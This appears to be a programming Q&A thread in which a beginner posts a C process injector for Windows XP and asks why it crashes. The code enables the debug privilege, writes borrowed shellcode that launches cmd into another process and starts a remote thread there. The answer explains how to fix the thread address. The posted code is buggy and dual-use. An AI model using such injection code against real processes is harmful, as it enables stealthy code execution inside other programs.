# Windows Process injection crash

Tags: c, windows

this is my first semi-major C project. I'm a self taught programmer so if my code has any major flaws OR if you happen to have any tips for me, please point them out, I'm very eager to learn. Thank you.

Anyway, I decided to code a process injector for windows, as title says, and I every time I attempt to inject the windows XP SP2 calc into designated process, it crashes. The reason I had decided to make it XP based was because this is a test version/POC/whatever.

Is this because the shellcode is only applicable for specific processes?
I had attempted different processes, explorer.exe, firefox.exe, etc. Still crashes.
Oh, and FYI my ASM isn't the best so I borrowed some shellcode from shell-storm

Also, how does the code look? I had some problems understanding the MSDN API for some of the psapi / windows parameters. It seemed kind of vague, and it was kind of hard to find examples online for some of my questions.

```
#include <windows.h>
#include <stdio.h>
#include <psapi.h>
#define BYTESIZE 100

void ProcessIdentf(DWORD ProcessID);
//Required for Process Handling rights
int SeDebugMode(HANDLE ProcessEnabled, LPCTSTR Base_Name);

int main(void){
    //x86 | Windows XP SP2 | calc.exe call
    //POC data
    unsigned char call_calc[] =
    "\x31\xc0\xeb\x13\x5b\x88\x43\x0e\x53\xbb\xad\x23\x86\x7c\xff\xd3\xbb"
    "\xfa\xca\x81\x7c\xff\xd3\xe8\xe8\xff\xff\xff\x63\x6d\x64\x2e\x65\x78"
    "\x65\x20\x2f\x63\x20\x63\x6d\x64";
    //Process HANDLE && Process Identifier WORD
    HANDLE FfHandle;
    int ProcID;
    //VirtualAllocMemPnter
    LPVOID lpv = NULL;
    //Typecasted pointer to Shellcode
    char* shellptr = call_calc;
    //Handle for CreateRemoteThread function
    HANDLE ControlStructRemote;
    //Number of bytes successfully executed
    SIZE_T bytescom;
    //Data for Process enumeration
    DWORD xyProcesses[1024]; //Max_Proc
    DWORD abProcesses, cntbNeeded;
    unsigned int c;
    printf("POC version x00.\nInjects example x86 shellcode into process.\n");
    SeDebugMode(GetCurrentProcess(), SE_DEBUG_NAME);
    printf("SE_DEBUG_PRIVILEGE successfully enabled.\nPrinting process' eligable for  injection\n");
    Sleep(10000);
    if(!EnumProcesses(xyProcesses, sizeof(xyProcesses), &cntbNeeded)){
        exit(1);
    }
    abProcesses = cntbNeeded / sizeof(DWORD);
    //Enumerate processes owned by current user
    for(c = 0; c &lt; abProcesses; c++){
        if(xyProcesses[c] != 0){
            ProcessIdentf(xyProcesses[c]);
        }
    }
    printf("Process PID required\n");
    scanf("%d", &ProcID);
    FfHandle = OpenProcess(PROCESS_ALL_ACCESS,
    FALSE,
    ProcID);
    lpv = VirtualAllocEx(FfHandle,
    NULL,
    BYTESIZE,
    MEM_COMMIT,
    0x40); //PAGE_EXECUTE_READWRITE
    if(WriteProcessMemory(FfHandle, lpv, &shellptr, sizeof(shellptr), &bytescom) != 0){
        ControlStructRemote = CreateRemoteThread(FfHandle,
        0,
        0,
        (DWORD (__stdcall*) (void*)) shellptr,
        0,
        0,
        0);
        if(ControlStructRemote){
            printf("POC shellcode successful.\n");
        }
        else{
            printf("Failure, CreateRemoteThread could not spawn a remote thread or failed to exec in target process\n");
        }
    }
    return 0;
}

void ProcessIdentf(DWORD ProcID){
    //Enumerates PID and modules. Prints. Implement in loop
    //unicode char, max ntfs datafile
    TCHAR szProcessname[MAX_PATH] = TEXT("&lt;unknown&gt;");
    //open proc handle
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS,
    FALSE, ProcID);
    //enum modules
    if(NULL != hProcess){
        HMODULE hMod;
        DWORD cbNeed;
        if(EnumProcessModules(hProcess,&hMod, sizeof(hMod),&cbNeed))
        {
            GetModuleBaseName(hProcess, hMod, szProcessname,
            sizeof(szProcessname)/sizeof(TCHAR));
        }
    }
    //print PID
    printf("%s PID: %u\n", szProcessname, ProcID);
    //close processhandle
    CloseHandle(hProcess);
}

int SeDebugMode(HANDLE xyProcess, LPCTSTR DebugPriv){
    HANDLE hTokenProc;
    LUID xDebugVal;
    TOKEN_PRIVILEGES tPriv;
    if(OpenProcessToken(xyProcess,
    TOKEN_ADJUST_PRIVILEGES,
    &hTokenProc)){
        if(LookupPrivilegeValue(NULL, DebugPriv, &xDebugVal)){
            tPriv.PrivilegeCount = 1;
            tPriv.Privileges[0].Luid = xDebugVal;
            tPriv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
            AdjustTokenPrivileges(hTokenProc,
            FALSE,
            &tPriv,
            sizeof(TOKEN_PRIVILEGES),
            NULL,
            NULL
            );
            if(GetLastError() == ERROR_SUCCESS){
                return TRUE;
            }
        }
    }
    return FALSE;
}
```

Comment: I'm not sure SO is the place to get help writing malware.

Answer (score 1):

You create the remote thread at `shellptr`, but it should be `lpv` where you wrote the code to.

BTW, try to avoid PROCESS_ALL_ACCESS, only specify what exact access you need (it's all on MSDN for each API)